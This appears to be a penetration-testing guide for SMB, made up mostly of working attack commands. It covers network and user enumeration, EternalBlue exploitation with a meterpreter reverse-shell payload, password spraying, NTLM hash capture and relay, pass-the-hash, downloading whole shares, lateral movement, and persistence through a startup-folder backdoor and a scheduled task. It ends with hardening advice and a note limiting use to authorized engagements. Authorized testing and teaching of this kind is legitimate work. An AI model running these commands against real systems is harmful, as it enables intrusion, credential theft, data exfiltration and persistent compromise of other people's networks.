SMB-Penetration-Testing-Guide

Reconnaissance

Network Discovery

# Find hosts with SMB open
nmap -p 445 --open 192.168.1.0/24

# Quick SMB discovery
crackmapexec smb 192.168.1.0/24

# NetBIOS scan
nbtscan 192.168.1.0/24

Port Scanning

# Standard SMB ports
nmap -p 139,445 -sV -sC 192.168.1.10

# Aggressive scan with OS detection
nmap -p 445 -A 192.168.1.10

# Version detection
nmap -p 445 --script smb-protocols,smb-security-mode 192.168.1.10

Key Information to Gather:

SMB version (v1, v2, v3)
OS version
Hostname/Domain
SMB signing status
Message signing required/not required

Enumeration

Null Session Testing

# Test with smbclient
smbclient -L //192.168.1.10 -N

# Test with rpcclient
rpcclient -U "" -N 192.168.1.10

# Test with enum4linux
enum4linux -a 192.168.1.10

# Test with smbmap
smbmap -H 192.168.1.10 -u "" -p ""

# List shares (authenticated)
smbmap -H 192.168.1.10 -u username -p password

# List shares with permissions
crackmapexec smb 192.168.1.10 -u username -p password --shares

# Recursive listing
smbmap -H 192.168.1.10 -u username -p password -R

# Access specific share
smbclient //192.168.1.10/sharename -U username

User Enumeration

# Using rpcclient
rpcclient -U username 192.168.1.10
> enumdomusers
> queryuser 0x1f4
> querydispinfo
> enumdomgroups

# RID Cycling (manual)
for i in $(seq 500 1100); do
    rpcclient -U username 192.168.1.10 -c "queryuser 0x$(printf '%x' $i)" 2>/dev/null
done

# Using enum4linux
enum4linux -U 192.168.1.10
enum4linux -r -u username -p password 192.168.1.10

# Using CrackMapExec
crackmapexec smb 192.168.1.10 -u username -p password --users

Password Policy Enumeration

# Using rpcclient
rpcclient -U username 192.168.1.10
> getdompwinfo

# Using enum4linux
enum4linux -P 192.168.1.10

# Using CrackMapExec
crackmapexec smb 192.168.1.10 -u username -p password --pass-pol

Key Info from Password Policy:

Minimum password length
Password complexity requirements
Account lockout threshold
Lockout duration
Password history

Vulnerability Scanning

Check for Common Vulnerabilities

# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10

# SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 192.168.1.10

# All SMB vulnerabilities
nmap -p 445 --script smb-vuln* 192.168.1.10

# Using Metasploit
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.10
run

Check SMB Signing

# Using Nmap
nmap -p 445 --script smb-security-mode 192.168.1.10

# Using CrackMapExec
crackmapexec smb 192.168.1.10

# Using rpcclient
rpcclient -U "" -N 192.168.1.10
> srvinfo

Why SMB Signing Matters:

If disabled → SMB Relay attacks possible
If not required → MITM attacks possible
If enforced → More secure but relay still possible in some scenarios

Exploitation

EternalBlue (MS17-010)

# Using Metasploit
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

# Verify vulnerability first
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.10
run

Exploiting Writable Shares

# Find writable shares
smbmap -H 192.168.1.10 -u username -p password

# Upload malicious file
smbclient //192.168.1.10/writable_share -U username
> put payload.exe

# Upload via smbmap
smbmap -H 192.168.1.10 -u username -p password --upload '/local/payload.exe' 'share/payload.exe'

# Execute uploaded file (if you have permissions)
crackmapexec smb 192.168.1.10 -u username -p password -x 'payload.exe'

PSExec-style Execution

# Using Impacket's psexec
psexec.py domain/username:password@192.168.1.10

# Using CrackMapExec
crackmapexec smb 192.168.1.10 -u username -p password -x 'whoami'

# Using Metasploit
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.10
set SMBUser username
set SMBPass password
exploit

Credential Attacks

Password Spraying

# Using CrackMapExec (recommended)
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success

# Using Hydra
hydra -L users.txt -p 'Password123' smb://192.168.1.10

# Using Metasploit
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.10
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Best Practices for Password Spraying:

Use common passwords: Password123, Welcome1, CompanyName2024
Spray slowly to avoid account lockouts
Check password policy first
Use 1 password against all users, not all passwords against 1 user

Capturing NTLM Hashes (Responder)

# Start Responder
sudo responder -I eth0 -wrf

# Force authentication via SMB
# From Windows target: \\attacker_IP\share

# View captured hashes
cat /usr/share/responder/logs/*.txt

SMB Relay Attack

# Setup (requires SMB signing disabled on target)
# Edit Responder.conf: Set SMB and HTTP to Off

# Start Responder
sudo responder -I eth0 -wrf

# Start ntlmrelayx (in another terminal)
ntlmrelayx.py -tf targets.txt -smb2support

# Or relay to specific target
ntlmrelayx.py -t 192.168.1.10 -smb2support -c "whoami"

# Trigger authentication from victim
# Victim connects to: \\attacker_IP\share

Pass-the-Hash

# Using pth-toolkit
pth-winexe -U domain/username%hash //192.168.1.10 cmd

# Using CrackMapExec
crackmapexec smb 192.168.1.10 -u username -H NTLM_HASH

# Using Impacket
psexec.py -hashes :NTLM_HASH username@192.168.1.10

# Using evil-winrm (if WinRM is available)
evil-winrm -i 192.168.1.10 -u username -H NTLM_HASH

Hash Cracking

# Using John the Ripper
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Using Hashcat
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

# NTLMv1
hashcat -m 5500 hashes.txt wordlist.txt

# NTLMv2
hashcat -m 5600 hashes.txt wordlist.txt

Post-Exploitation

File Exfiltration

# Download entire share
smbclient //192.168.1.10/share -U username
> recurse ON
> prompt OFF
> mget *

# Using smbmap
smbmap -H 192.168.1.10 -u username -p password -R --download 'share/'

# Download specific files
smbmap -H 192.168.1.10 -u username -p password --download 'share/sensitive.txt'

Search for Sensitive Files

# Using smbmap with pattern matching
smbmap -H 192.168.1.10 -u username -p password -R --pattern '.*password.*'

# Using CrackMapExec spider
crackmapexec smb 192.168.1.10 -u username -p password --spider C$ --pattern txt

# Common sensitive files to look for:
# - *.config
# - *.xml
# - *.ini
# - *.kdbx (KeePass)
# - *.txt containing: password, pass, pwd, credential
# - web.config
# - unattend.xml

Lateral Movement

# Get list of domain computers
crackmapexec smb 192.168.1.10 -u username -p password --computers

# Spray credentials across network
crackmapexec smb 192.168.1.0/24 -u username -p password

# Execute commands on multiple hosts
crackmapexec smb 192.168.1.0/24 -u username -p password -x 'whoami'

# Pass credentials to other machines
psexec.py domain/username:password@192.168.1.11

Persistence via SMB

# Upload backdoor to startup folder
smbclient //192.168.1.10/C$ -U username
> cd "Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
> put backdoor.exe

# Create scheduled task via SMB
crackmapexec smb 192.168.1.10 -u username -p password -x 'schtasks /create /tn "Update" /tr "C:\backdoor.exe" /sc onlogon'

Tool Reference

Essential Tools Installation

sudo apt update
sudo apt install -y smbclient cifs-utils samba
sudo apt install -y enum4linux enum4linux-ng
sudo apt install -y smbmap crackmapexec
sudo apt install -y nmap
sudo apt install -y responder
sudo apt install -y metasploit-framework
pip3 install impacket

Quick Command Reference

smbclient:

# List shares
smbclient -L //IP -U username

# Connect to share
smbclient //IP/share -U username

# Common commands inside smbclient:
ls, cd, get, put, mget, mput, recurse, prompt

smbmap:

# Basic enumeration
smbmap -H IP -u username -p password

# Recursive listing
smbmap -H IP -u username -p password -R

smbmap -H 10.129.14.128 -r notes
# Download file
smbmap -H IP -u username -p password --download 'path/file'

# Upload file
smbmap -H IP -u username -p password --upload 'local' 'remote'

crackmapexec:

# Enumerate shares
crackmapexec smb IP -u username -p password --shares

# Execute command
crackmapexec smb IP -u username -p password -x 'command'

# Spider shares
crackmapexec smb IP -u username -p password --spider SHARE --pattern txt

# Dump SAM
crackmapexec smb IP -u username -p password --sam

rpcclient:

# Connect
rpcclient -U username IP

# Essential commands:
enumdomusers          # List users
enumdomgroups         # List groups
queryuser RID         # Get user info
querydispinfo         # Display info
getdompwinfo          # Password policy
srvinfo               # Server info

enum4linux:

# Full enumeration
enum4linux -a IP

# Specific enumerations:
enum4linux -U IP      # Users
enum4linux -S IP      # Shares
enum4linux -G IP      # Groups
enum4linux -P IP      # Password policy
enum4linux -r IP      # RID cycling

Nmap NSE Scripts

# SMB protocols
smb-protocols

# Security mode
smb-security-mode

# Enumerate shares
smb-enum-shares

# Enumerate users
smb-enum-users

# OS discovery
smb-os-discovery

# Vulnerabilities
smb-vuln-ms17-010
smb-vuln-cve-2020-0796
smb-vuln*

Common Scenarios & Solutions

Scenario 1: Null Session Access

# Test for null session
smbclient -L //192.168.1.10 -N

# If successful, enumerate everything
enum4linux -a 192.168.1.10

# Extract user list
rpcclient -U "" -N 192.168.1.10 -c "enumdomusers" | cut -d'[' -f2 | cut -d']' -f1 > users.txt

# Password spray the users
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123'

Scenario 2: Guest Account Access

# Try guest account
smbmap -H 192.168.1.10 -u guest -p ''

# List shares as guest
crackmapexec smb 192.168.1.10 -u guest -p '' --shares

# Access readable shares
smbclient //192.168.1.10/share -U guest

Scenario 3: SMB Signing Disabled

# Verify signing is disabled
nmap -p 445 --script smb-security-mode 192.168.1.10

# Setup relay attack
sudo responder -I eth0
ntlmrelayx.py -tf targets.txt -smb2support

# Wait for authentication
# Profit: Get shell or dump creds

# Verify write access
smbmap -H 192.168.1.10 -u username -p password | grep WRITE

# Upload payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe
smbmap -H 192.168.1.10 -u username -p password --upload 'payload.exe' 'share/payload.exe'

# Execute (if possible)
crackmapexec smb 192.168.1.10 -u username -p password -x 'share\payload.exe'

Reporting Findings

Critical Findings

Null Session Access → Allows unauthenticated enumeration
Guest Account Enabled → Anonymous access to shares
SMB Signing Disabled → SMB relay attacks possible
SMBv1 Enabled → Vulnerable to EternalBlue (MS17-010)
Weak Passwords → Password spraying successful
Writable Shares → Code execution possible

Evidence Collection

# Save enumeration results
enum4linux -a 192.168.1.10 > enum_output.txt

# Save share listing
smbmap -H 192.168.1.10 -u username -p password > shares.txt

# Screenshot successful exploits
# Take packet captures during attacks
tcpdump -i eth0 -w smb_attack.pcap port 445

# Document all findings with:
# - Target IP and hostname
# - Vulnerability details
# - Exploitation steps
# - Impact assessment
# - Remediation recommendations

Prevention & Hardening

Security Recommendations

Disable SMBv1 - Always use SMBv2 or SMBv3
Enable SMB Signing - Require message signing
Disable Null Sessions - RestrictAnonymous = 2
Disable Guest Account - No anonymous access
Strong Password Policy - Complex passwords, no default creds
Restrict Share Permissions - Least privilege principle
Network Segmentation - Limit SMB traffic with firewall rules
Patch Management - Keep systems updated (MS17-010, etc.)
Monitor SMB Logs - Detect suspicious activity
Use Account Lockout - Prevent brute force (but avoid DoS)

Last Updated: November 2025 Target Audience: Penetration Testers & Security Professionals Disclaimer: Use only in authorized engagements. Unauthorized access is illegal.

PreviousSmb NextSetting-Up-samba

Last updated 2 months ago

hashtagTable of Contents

hashtagReconnaissance

hashtagNetwork Discovery

hashtagPort Scanning

hashtagEnumeration

hashtagNull Session Testing

hashtagShare Enumeration

hashtagUser Enumeration

hashtagPassword Policy Enumeration

hashtagVulnerability Scanning

hashtagCheck for Common Vulnerabilities

hashtagCheck SMB Signing

hashtagExploitation

hashtagEternalBlue (MS17-010)

hashtagExploiting Writable Shares

hashtagPSExec-style Execution

hashtagCredential Attacks

hashtagPassword Spraying

hashtagCapturing NTLM Hashes (Responder)

hashtagSMB Relay Attack

hashtagPass-the-Hash

hashtagHash Cracking

hashtagPost-Exploitation

hashtagFile Exfiltration

hashtagSearch for Sensitive Files

hashtagLateral Movement

hashtagPersistence via SMB

hashtagTool Reference

hashtagEssential Tools Installation

hashtagQuick Command Reference

hashtagNmap NSE Scripts

hashtagCommon Scenarios & Solutions

hashtagScenario 1: Null Session Access

hashtagScenario 2: Guest Account Access

hashtagScenario 3: SMB Signing Disabled

hashtagScenario 4: Writable Share Found

hashtagReporting Findings

hashtagCritical Findings

hashtagEvidence Collection

hashtagPrevention & Hardening

hashtagSecurity Recommendations

Table of Contents